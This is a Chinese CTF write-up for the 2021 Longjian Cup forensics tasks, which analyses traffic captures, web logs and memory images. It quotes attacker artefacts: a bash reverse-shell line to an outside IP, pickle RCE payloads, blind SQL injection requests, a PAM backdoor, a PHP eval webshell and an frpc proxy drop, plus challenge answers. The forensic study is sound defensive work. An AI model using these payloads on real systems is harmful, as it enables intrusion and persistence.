2025年2月8日11:18:19评论15 views字数 24621阅读82分4秒阅读模式

前言

记录DIDCTF的2021陇剑杯的题目，题目质量还是可以的。

零、签到题

此时正在进行的可能是＿协议的网络攻击。（如有字母请全部使用小写，请自行修改文件后缀名为.zip）

过滤HTTP协议，看到全都是GET /的请求，而服务器全都是返回的403 Forbidden：

http协议的网络攻击。

一、jwt

1、jwt-1

昨天，单位流量系统捕获了黑客攻击流量，请您分析流量后进行回答：该网站使用了( )认证方式？(如有字母则默认小写)

打开流量包的第一条，追踪流后看到里面的Cookie明显是用的jwt：

认证方式：jwt

2、jwt-2

黑客绕过验证使用的jwt中，id和username是___。（中间使用#号隔开，例如1#admin）

追踪到TCP流的10号，发现攻击者执行了whoami，并且执行成功了，服务器返回了root，因此这个token肯定是绕过验证的jwt：

把这个jwt取出来放到网站中解密：eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTAwODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19.rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0

答案：10087#admin

3、jwt-3

黑客获取webshell之后，权限是___？(字母默认小写)

上个题就做出来了，TCP流的10号，攻击者执行了whoami，服务器返回了root：

4、jwt-4

黑客上传的恶意文件文件名是___。(请提交带有文件后缀的文件名，例如x.txt)

TCP流的13号：

command=echo xxx > /tmp/1.c

文件名是：1.c

5、jwt-5

黑客在服务器上编译的恶意so文件，文件名是___。(请提交带有文件后缀的文件名，例如x.so)

TCP流的21号：

攻击者执行了ls /tmp，服务器返回了Makefile和looter.so

所以编译的so文件是：looter.so

6、jwt-6

黑客在服务器上修改了一个配置文件，文件的绝对路径为___。（请确认绝对路径后再提交）

TCP流的26号：

攻击者执行了：

command=echo%20"auth%20optional%20looter.so">>/etc/pam.d/common-auth

二、日志分析

1、日志分析-1

单位某应用程序被攻击，请分析日志，进行作答：网络存在源码泄漏，源码文件名是__

给了个access.log，web应用的日志……

直接搜索200：

源码文件：www.zip

2、日志分析-2

分析攻击流量，黑客往/tmp目录写入一个文件，文件名为___。

直接搜索tmp：

URL解码一下：

可以看到文件名：sess_car

3、日志分析-3

分析攻击流量，黑客使用的是__类读取了秘密文件。

还是上面那条日志：

172.17.0.1 - - [07/Aug/2021:01:38:21  0000] "GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1" 302 879 "-""python-requests/2.26.0"

类：SplFileObject

三、简单日志分析

1、简单日志分析-1

某应用程序被攻击，请分析日志后作答：黑客攻击的参数是___。（如有字母请全部使用小写）

前面都是目录扫描，然后翻到了传参的日志：

参数就是：user

2、简单日志分析-2

黑客查看的秘密文件的绝对路径是___。（不带 / ）

除去404的日志就剩3个500的了，一个个解码找到第二条是秘密文件：

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -

解码：cat /Th4s_IS_VERY_Import_Fi1e

绝对路径（不带/）：Th4s_IS_VERY_Import_Fi1e

3、简单日志分析-3

黑客反弹shell的ip和端口是___。（格式使用“ip:端口"，例如127.0.0.1:2333）

状态码500的日志总共3条，看第三条：

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -

解码：

命令：bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

ip和端口：192.168.2.197:8888

四、SQL注入

1、SQL注入-1

某应用程序被攻击，请分析日志后作答：黑客在注入过程中采用的注入手法叫___。（格式为4个汉字，例如“拼搏努力”）

直接拿出日志里第一条记录：

172.17.0.1 - - [01/Sep/2021:01:37:25 +0000] "GET /index.php?id=1%20and%20if(substr(database(),1,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 422 "-""python-requests/2.26.0"URL解码一下->172.17.0.1 - - [01/Sep/2021:01:37:25  0000] "GET /index.php?id=1 and if(substr(database(),1,1) = '',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 422 "-""python-requests/2.26.0"

明显的布尔盲注

2、SQL注入-2

黑客在注入过程中，最终获取flag的数据库名、表名和字段名是___。（格式为“数据库名#表名#字段名”，例如database#table#column）

取出所有盲注正确的日志：

首先是数据库名：sqli

172.17.0.1 - - [01/Sep/2021:01:37:25  0000] "GET /index.php?id=1 and if(substr(database(),1,1) = 's',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:37:25  0000] "GET /index.php?id=1 and if(substr(database(),2,1) = 'q',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 473 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:37:25  0000] "GET /index.php?id=1 and if(substr(database(),3,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:37:25  0000] "GET /index.php?id=1 and if(substr(database(),4,1) = 'i',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-""python-requests/2.26.0"

然后是表名：flag

172.17.0.1 - - [01/Sep/2021:01:42:24  0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 492 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:42:24  0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 495 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:42:25  0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 495 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:42:25  0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 494 "-""python-requests/2.26.0"

然后是列名：flag

172.17.0.1 - - [01/Sep/2021:01:44:01  0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 501 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:44:01  0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:44:01  0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:44:02  0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-""python-requests/2.26.0"

全部整合到一起，题目要求的是数据库名#表名#字段名

sqli#flag#flag

3、SQL注入-3

黑客最后获取到的flag字符串为__。

接着上一题往后看，最后是盲注获取的数据：flag{deddcd67-bcfd-487e-b940-1217e668c7db}

172.17.0.1 - - [01/Sep/2021:01:45:55  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),5,1) = '{',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),6,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),7,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),8,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:56  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),9,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:57  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),10,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:57  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),11,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:57  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),12,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:58  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),13,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:58  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),14,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:58  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),15,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:58  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),16,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:58  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),17,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:59  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),18,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:59  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),19,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:45:59  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),20,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:00  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),21,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:00  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),22,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:00  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),23,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:01  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),24,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:01  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),25,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:01  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),26,1) = '9',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:02  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),27,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:02  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),28,1) = '0',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:02  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),29,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:03  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),30,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:03  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),31,1) = '2',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:04  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),32,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:04  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),33,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:04  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),34,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:04  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),35,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:05  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),36,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:05  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),37,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:05  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),38,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:06  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),39,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:06  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),40,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:06  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),41,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:06  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),42,1) = '}',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"172.17.0.1 - - [01/Sep/2021:01:46:06  0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),43,1) = ' ',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 478 "-""python-requests/2.26.0"

五、WIFI

网管小王最近喜欢上了ctf网络安全竞赛，他使用“哥斯拉”木引进玩玩upload-labs ，并且保存了内存镜像、 wifi和服务器流量，让您来分析后作答：小王往upload-labs上传木马后进行了cat /flag，flag内容为__。（压缩包里有解压密码的提示，需要额外添加花括号）

首先打开服务端流量包，过滤http请求，得到了5个POST请求包，请求的是1.php：

随便打开一个看看：

加密流量，那就需要解密了：

然后把服务器的日志都看完了，没有什么可用内容。

接下来看客户端的流量：

802.11是WiFi的流量，但是识别不出来，应该是加密的……

正好学一下wireshark的通信流量解密：

这个的加密方式是WPA，解密需要SSID和密码：

SSID已经给了：My_wifi

密码应该在镜像中，去看一下：

filescan->0x000000003fdc38c8      2      0 -W-rwd DeviceHarddiskVolume1Program FilesMy_Wifi.zipTempvmware-adminVMwareDnD2a1221c7My_Wifi.zip

导出这个文件：

解压这个压缩包又需要密码，压缩包中有提示：

查资料说GUID与网卡有关，搜索Interfaces找到了：

0x000000001c7ec5c8      2      1 R--rwd DeviceHarddiskVolume1ProgramDataMicrosoftWlansvcProfilesInterfaces{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}

然后解压压缩包得到了：

<?xml version="1.0"?><WLANProfilexmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>My_Wifi</name><SSIDConfig><SSID><hex>4D795F57696669</hex><name>My_Wifi</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>auto</connectionMode><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>233@114514_qwe</keyMaterial></sharedKey></security></MSM></WLANProfile>

然后得到了密码：233@114514_qwe

接下来配置wireshark：

然后过滤http请求：

一个个解密分析，很老的哥斯拉了，用脚本来：

<?php//直接使用encode方法functionencode($D,$K){for($i=0;$i<strlen($D);$i++) {        $c = $K[$i+1&15];        $D[$i] = $D[$i]^$c;    }return $D;}$key='3c6e0b8a9c15224a';$key1="密文";$str=substr($key1,16,-16);//原来的数据去掉前十六位和后十六位$str=gzdecode(encode(base64_decode($str),$key));echo $str;?>

最后解密到tcp流的39发现了flag：flag{5db5b7b0bb74babb66e1522f3a6b1b12}

六、内存分析

1、内存分析-1

虚拟机的密码是___。（密码中为flag{xxxx}，含有空格，提交时不要去掉）

用volatility提取镜像，然后用mimikatz插件

mimikatz->flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

2、内存分析-2

虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为__。(解题过程中需要用到上一题答案中flag内的内容进行处理。本题的格式也是flag{xx}，答案含有空格时，空格不要去掉）

扫描所有文件，找到了一个DeviceHarddiskVolume1UsersCTFDesktopHUAWEI P40_2021-aa-bb xx.yy.zz.exe

导出该文件，后缀修改为exe，双击运行是让解压：

解压出来得到一个文件夹，文件夹中找到了一个images0.tar.enc。

这应该就用上题目的提示了：上一题的flag是密码，空格改成下划线：W31C0M3_T0_THiS_34SY_F0R3NSiCX

然后解密华为备份文件：要使用kobackupdec.py脚本

https://github.com/RealityNet/kobackupdecpython3 kobackupdec.py -vvv "W31C0M3_T0_THiS_34SY_F0R3NSiCX""HUAWEI P40_2021-aa-bb xx.yy.zz/""./"

flag{TH4NK Y0U FOR DECRYPTING MY DATA}

七、IOS

1、IOS-1

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客所控制的C&C服务器IP是___。

TCP流的15号，控制的服务器是3.128.156.159

2、IOS-2

黑客利用的Github开源项目的名字是___。（如有字母请全部使用小写）

还是TCP流的15号：

通过wget下载了github上的一个文件：Stowaway

3、IOS-3

通讯加密密钥的明文是___。

还是TCP流的15号，密钥：hack4sec

4、IOS-4

黑客通过SQL盲注拿到了一个敏感数据，内容是___。

首先现在的通信流量都是TLS加密了，需要先解密，所以题目附件给了个keylog.txt：

然后流量就解密了。

然后找到一条应该是注入的流量：

看到它用的是http2，所以接下来过滤http2的流量，找到了SQL注入的流量：

摘出所有的判断正确流量：

/info?l=1&o=(case_when_(select_hex(substr(password,1,1))_from_user)="37"_then_id_else_col1_end), WINDOW_UPDATE[23]/info?l=1&o=(case_when_(select_hex(substr(password,2,1))_from_user)="34"_then_id_else_col1_end), WINDOW_UPDATE[41]/info?l=1&o=(case_when_(select_hex(substr(password,3,1))_from_user)="36"_then_id_else_col1_end), WINDOW_UPDATE[63]/info?l=1&o=(case_when_(select_hex(substr(password,4,1))_from_user)="35"_then_id_else_col1_end), WINDOW_UPDATE[83]/info?l=1&o=(case_when_(select_hex(substr(password,5,1))_from_user)="35"_then_id_else_col1_end), WINDOW_UPDATE[103]/info?l=1&o=(case_when_(select_hex(substr(password,6,1))_from_user)="38"_then_id_else_col1_end), WINDOW_UPDATE[129]/info?l=1&o=(case_when_(select_hex(substr(password,7,1))_from_user)="66"_then_id_else_col1_end), WINDOW_UPDATE[169]/info?l=1&o=(case_when_(select_hex(substr(password,8,1))_from_user)="33"_then_id_else_col1_end), WINDOW_UPDATE[185]/info?l=1&o=(case_when_(select_hex(substr(password,9,1))_from_user)="2D"_then_id_else_col1_end), WINDOW_UPDATE[189]/info?l=1&o=(case_when_(select_hex(substr(password,10,1))_from_user)="63"_then_id_else_col1_end), WINDOW_UPDATE[223]/info?l=1&o=(case_when_(select_hex(substr(password,11,1))_from_user)="38"_then_id_else_col1_end), WINDOW_UPDATE[249]/info?l=1&o=(case_when_(select_hex(substr(password,12,1))_from_user)="34"_then_id_else_col1_end), WINDOW_UPDATE[267]/info?l=1&o=(case_when_(select_hex(substr(password,13,1))_from_user)="31"_then_id_else_col1_end), WINDOW_UPDATE[279]/info?l=1&o=(case_when_(select_hex(substr(password,14,1))_from_user)="2D"_then_id_else_col1_end), WINDOW_UPDATE[283]/info?l=1&o=(case_when_(select_hex(substr(password,15,1))_from_user)="34"_then_id_else_col1_end), WINDOW_UPDATE[301]/info?l=1&o=(case_when_(select_hex(substr(password,16,1))_from_user)="35"_then_id_else_col1_end), WINDOW_UPDATE[321]/info?l=1&o=(case_when_(select_hex(substr(password,17,1))_from_user)="36"_then_id_else_col1_end), WINDOW_UPDATE[343]/info?l=1&o=(case_when_(select_hex(substr(password,18,1))_from_user)="62"_then_id_else_col1_end), WINDOW_UPDATE[375]/info?l=1&o=(case_when_(select_hex(substr(password,19,1))_from_user)="2D"_then_id_else_col1_end), WINDOW_UPDATE[379]/info?l=1&o=(case_when_(select_hex(substr(password,20,1))_from_user)="38"_then_id_else_col1_end), WINDOW_UPDATE[405]/info?l=1&o=(case_when_(select_hex(substr(password,21,1))_from_user)="35"_then_id_else_col1_end), WINDOW_UPDATE[425]/info?l=1&o=(case_when_(select_hex(substr(password,22,1))_from_user)="64"_then_id_else_col1_end), WINDOW_UPDATE[461]/info?l=1&o=(case_when_(select_hex(substr(password,23,1))_from_user)="37"_then_id_else_col1_end), WINDOW_UPDATE[485]/info?l=1&o=(case_when_(select_hex(substr(password,24,1))_from_user)="2D"_then_id_else_col1_end), WINDOW_UPDATE[489]/info?l=1&o=(case_when_(select_hex(substr(password,25,1))_from_user)="64"_then_id_else_col1_end), WINDOW_UPDATE[525]/info?l=1&o=(case_when_(select_hex(substr(password,26,1))_from_user)="36"_then_id_else_col1_end), WINDOW_UPDATE[547]/info?l=1&o=(case_when_(select_hex(substr(password,27,1))_from_user)="63"_then_id_else_col1_end), WINDOW_UPDATE[581]/info?l=1&o=(case_when_(select_hex(substr(password,28,1))_from_user)="30"_then_id_else_col1_end), WINDOW_UPDATE[591]/info?l=1&o=(case_when_(select_hex(substr(password,29,1))_from_user)="66"_then_id_else_col1_end), WINDOW_UPDATE[631]/info?l=1&o=(case_when_(select_hex(substr(password,30,1))_from_user)="32"_then_id_else_col1_end), WINDOW_UPDATE[645]/info?l=1&o=(case_when_(select_hex(substr(password,31,1))_from_user)="65"_then_id_else_col1_end), WINDOW_UPDATE[683]/info?l=1&o=(case_when_(select_hex(substr(password,32,1))_from_user)="64"_then_id_else_col1_end), WINDOW_UPDATE[719]/info?l=1&o=(case_when_(select_hex(substr(password,33,1))_from_user)="61"_then_id_else_col1_end), WINDOW_UPDATE[749]/info?l=1&o=(case_when_(select_hex(substr(password,34,1))_from_user)="62"_then_id_else_col1_end), WINDOW_UPDATE[781]/info?l=1&o=(case_when_(select_hex(substr(password,35,1))_from_user)="62"_then_id_else_col1_end), WINDOW_UPDATE[813]/info?l=1&o=(case_when_(select_hex(substr(password,36,1))_from_user)="32"_then_id_else_col1_end), WINDOW_UPDATE[827]/info?l=1&o=

拼在一起：

37 34 36 35 35 38 66 33 2D 63 38 34 31 2D 34 35 36 62 2D 38 35 64 37 2D 64 36 63 30 66 32 65 64 61 62 62 32

十六进制转字符：

746558f3-c841-456b-85d7-d6c0f2edabb2

5、IOS-5

黑客端口扫描的扫描器的扫描范围是__。（格式使用“开始端口-结束端口”，例如1-65535）

也是学到了：

点分析->专家信息：

选Connection reset：

然后就看到了端口信息，从10到499：

范围：10-499

6、IOS-6

黑客访问/攻击了内网的几个服务器，IP地址为__。（多个IP之间按从小到大排序，使用#来分隔，例如127.0.0.1#192.168.0.1)

首先TCP流的271可以看到SQL注入攻击了192.168.1.12：

然后看access.log：

访问了http://172.28.0.2/upload.php，大概率就是个木马文件，所以第二个IP是：172.28.0.2

IP地址为：172.28.0.2#192.168.1.12

7、IOS-7

黑客写入了一个webshell，其密码为:（）。（如有字母为小写）

直接看access.log：

172.28.0.3 - - [28/Aug/2021:18:45:14 +0000] "GET //ma.php?fxxk=system(base64_decode(%27d2hvYW1p%27)); HTTP/1.1" 200 38 "-""Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36""-"

密码：fxxk

八、Webshell

1、Webshell-1

黑客登陆系统使用的密码是__

直接过滤http contains "pass"，然后出来了2个流量包，直接追踪流：tcp.stream eq 6

密码：Admin123!@#

2、Webshell-2

黑客修改了一个日志文件，文件的绝对路径为__，答题格式：/xx/xxx/xxx/xxx.log，不区分大小写

TCP流的33：

文件为：data/Runtime/Logs/Home/21_08_07.log

由于问的是绝对路径，再把前面的路径拼起来：/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3、Webshell-3

黑客获取webshell之后的权限是：

TCP流的28：

攻击者执行了whoami，服务器返回的www-data

4、Webshell-4

黑客写入的webshell文件名是__。(请提交带有文件后缀的文件名，例如x.txt)

TCP流的33号：

payload语句：

aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');base64解码：<?php eval($_REQUEST[aaa]);?>

所以这个就是在写入webshell，文件名是1.php

5、Webshell-5

黑客上传的代理工具客户端名字是__。(如有字母请全部使用小写）仅文件名，不要后缀名

过滤htt contains "1.php"：

这些都是利用木马进行攻击的流量了，一个个分析，找到了TCP流的38号：

aaa=@ini_set("display_errors", "0");@set_time_limit(0);functionasenc($out){return $out;};functionasoutput(){$output=ob_get_contents();ob_end_clean();echo"28"."f72";echo @asenc($output);echo"f486"."11f4";}ob_start();try{$f=base64_decode(substr($_POST["j68071301598f"],2));$c=$_POST["xa5d606e67883a"];$c=str_replace("r","",$c);$c=str_replace("n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");;}catch(Exception $e){echo"ERROR://".$e->getMessage();};asoutput();die();&j68071301598f=FBL3Zhci93d3cvaHRtbC9mcnBjLmluaQ==&xa5d606e67883a=5B636F6D6D6F6E5D0A7365727665725F61646472203D203139322E3136382E3233392E3132330A7365727665725F706F7274203D20373737380A746F6B656E3D586133424A66326C35656E6D4E365A3741386D760A0A5B746573745F736F636B355D0A74797065203D207463700A72656D6F74655F706F7274203D383131310A706C7567696E203D20736F636B73350A706C7567696E5F75736572203D2030484446743136634C514A0A706C7567696E5F706173737764203D204A544E32373647700A7573655F656E6372797074696F6E203D20747275650A7573655F636F6D7072657373696F6E203D20747275650A

